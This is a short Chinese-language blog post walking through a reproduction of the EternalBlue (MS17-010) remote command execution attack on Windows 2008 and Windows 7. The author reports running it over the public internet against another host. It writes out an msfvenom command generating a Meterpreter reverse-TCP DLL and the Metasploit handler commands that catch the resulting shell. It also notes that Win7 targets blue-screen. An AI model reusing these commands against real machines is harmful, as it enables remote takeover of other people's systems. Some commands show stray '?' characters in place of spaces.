方程式漏洞之復現window2008/win7 遠程命令執行漏洞

前幾天就想寫的，因為一些緣故就沒寫。此次是在外網環境下進行的。大家在內網中也一個樣。

方法：

　　使用Eternalblue模塊，劍測是否有漏洞然后msf生成一個dll直接反彈shell.

PS：win版本的不知道緣何生成出來的dll是0kb 我就在自己本地的虛擬機生成了一個dll。生成dll命令

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=6566 -f dll > /opt/xishaonian.dll

然后copy到了自己的測試機。

測試機IP：118.244.x.x

被攻擊者IP：119.29.x.x

MSF監聽命令：

use exploit/multi/handler

set LHOST?192.168.1.109

set LPORT?6566

set PAYLOAD windows/x64/meterpreter/reverse_tcp

run

成功。

?

在測試當中，發現win7的會被藍屏，而08的卻不會

?